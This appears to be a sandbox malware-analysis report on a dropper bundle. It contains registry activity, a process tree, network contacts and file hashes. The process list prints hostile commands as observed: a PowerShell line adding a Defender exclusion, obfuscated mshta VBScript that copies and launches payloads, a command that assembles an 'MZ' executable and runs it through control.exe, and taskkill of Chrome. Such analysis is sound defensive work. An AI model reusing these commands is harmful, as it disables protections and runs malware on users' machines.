| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0752b359bd184a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767431039015654" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0752b359bd184a.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0741b6b6c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0752b359bd184a.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07be2debb1a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07e3a022a8656c5ca.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun075246a0bffeab.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0741b6b6c3.exe
Sun0741b6b6c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07778dd9fc6d53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07fcb30681127.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07dc9d2dae027.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0750d1e499.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0794d0eebce1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun07cad998fb20a18.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun075246a0bffeab.exe
Sun075246a0bffeab.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4820 -ip 4820
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0750d1e499.exe
Sun0750d1e499.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0752b359bd184a.exe
Sun0752b359bd184a.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07778dd9fc6d53.exe
Sun07778dd9fc6d53.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe
Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07be2debb1a.exe
Sun07be2debb1a.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07fcb30681127.exe
Sun07fcb30681127.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07e3a022a8656c5ca.exe
Sun07e3a022a8656c5ca.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07dc9d2dae027.exe
Sun07dc9d2dae027.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe
Sun07cad998fb20a18.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 580
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun0794d0eebce1.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3512 -ip 3512
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 360
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS884015E7\Sun07cad998fb20a18.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sun07cad998fb20a18.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4436 -ip 4436
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8e364cc40,0x7ff8e364cc4c,0x7ff8e364cc58
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 704
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1916 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2040,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2084 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 808
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1684 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4420,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4392 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 1060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4436 -ip 4436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 1284
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4948,i,12400694771009641929,10948011954533272136,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
C:\Users\Admin\AppData\Local\Temp\e59a86b.exe
"C:\Users\Admin\AppData\Local\Temp\e59a86b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 804
C:\Users\Admin\AppData\Local\Temp\e59d4cb.exe
"C:\Users\Admin\AppData\Local\Temp\e59d4cb.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2284 -ip 2284
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 804
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.206.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| NL | 45.133.1.182:80 | | tcp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| N/A | 127.0.0.1:59978 | | tcp |
| N/A | 127.0.0.1:59980 | | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | 47.215.142.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | ggg-cl.biz | udp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ggg-cl.biz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 45.133.1.107:80 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 9.206.16.2.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| NL | 45.9.20.13:80 | | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 45.9.20.13:80 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 72.84.118.132:8080 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 45.9.20.13:80 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| LV | 45.142.215.47:27643 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\setup_install.exe
| MD5 | 2d62b8cf0d215971e12220d96a099e81 |
| SHA1 | 72e43b82e9510321dbb5130d35d09acd850c7ad8 |
| SHA256 | bec993083a69304244f13e191173e31d23c634567ab21484258195086112aa40 |
| SHA512 | e0763f93143060599658b64cc3c0fa8e8be62c4af2567ab08868492546f200bb5a91b367d2eea296b0a6d71c39a0f0000d71a66aabc1d36664d01dedbfbc5f59 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS884015E7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/4820-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp
